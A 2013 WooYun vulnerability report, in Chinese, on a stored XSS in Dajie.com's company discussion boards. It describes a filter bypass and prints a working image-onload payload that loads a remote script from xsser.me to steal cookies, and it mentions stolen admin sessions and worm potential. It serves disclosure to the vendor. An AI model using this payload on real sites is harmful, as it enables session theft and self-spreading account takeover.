当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018266

漏洞标题:继续大街网储存型XSS,可以XSS在其招聘的的任意一个公司,可以盗号、蠕虫~o(╯□╰)o

相关厂商:大杰世纪科技发展(北京)有限公司

漏洞作者: px1624

提交时间:2013-02-02 12:41

修复时间:2013-03-19 12:41

公开时间:2013-03-19 12:41

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-02-02: 细节已通知厂商并且等待厂商处理中
2013-02-04: 厂商已经确认,细节仅向厂商公开
2013-02-14: 细节向核心白帽子及相关领域专家公开
2013-02-24: 细节向普通白帽子公开
2013-03-06: 细节向实习白帽子公开
2013-03-19: 细节向公众公开

简要描述:

其实这个漏洞早在一个月之前就发现了,只是想用这个测试下能不能xss到搜狗,但是搜狗的抓数据也太慢了,足足抓了一个月,今天去看了下,终于抓到了,看了下没啥大的利用价值,所以现在就把这个洞给提交下~~

详细说明:

1 这个属于之前提交的一个洞,修补的不够彻底。
之前的漏洞 WooYun: 大街网 非你莫属官网某板块储存型XSS,可以盗取用户cookie
2 修补之后,过滤掉了script,限制了长度,判断了提交图片地址中原地址的字符串是否存在,判断了图片的结尾是不是.jpg(.png .gif)之类的字符。
3 绕过方法很简单,由于网站有用到jq,所以直接用jq的函数即可在长度限制范围内构造XSS。直接将以下代码添加到原图片地址的src后面即可。
"onload="jQuery.getScript('http://xsser.me/t0Oy9U?'+Math.random())".jpg
图1

1.jpg


F12中复制出来的代码
<img src="http://fs3u.dajie.com/2013/01/07/085/13575224858054398m.png" onload="jQuery.getScript('http://xsser.me/t0Oy9U?'+Math.random())" .png"="" border="0">
4 之前只是在大街网《非你莫属》板块发现了这个,这次去看了下,所有的大街网的厂商(招聘公司)的讨论区中,因为调用的都是同一套发帖子的代码,故均存在这个漏洞。
图2 3 4

2.jpg

3.jpg

4.jpg


5 xss到的cookie,我只在非你莫属板块插了一个,就xss到了200多条~
图6 7

6.jpg

7.jpg


6 这个貌似是一个管理员(版主)的,可以看到有可管理的操作。
图8 9

8.jpg

9.jpg


7 可以看到大街网的招聘公司还是很多的,所以直接随便xss下管理员的账号之后,发布一些虚假的招聘信息,或者广告信息的话,危害还是蛮大的!!
图5

5.jpg


8 再看下发帖子的post数据,没有key、token这种东西,发帖子也没有验证码。这个意味着神马?
大家懂得,蠕虫不解释~~
蠕虫利用由于我这个帖子内容已经太长了,所以大家看这个帖子的利用方法和证明吧。
WooYun: 大街网某功能储存型XSS,导致可以在首页等位置蠕虫 + 盗取用户登录cookie
图10

10.jpg

漏洞证明:

看上面描述证明。

修复方案:

过滤~ 吼吼~~~

版权声明:转载请注明来源 px1624@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2013-02-04 14:35

厂商回复:

感谢您对大街网的支持,我们会尽快查证修复~

最新状态:

暂无


漏洞评价:

评论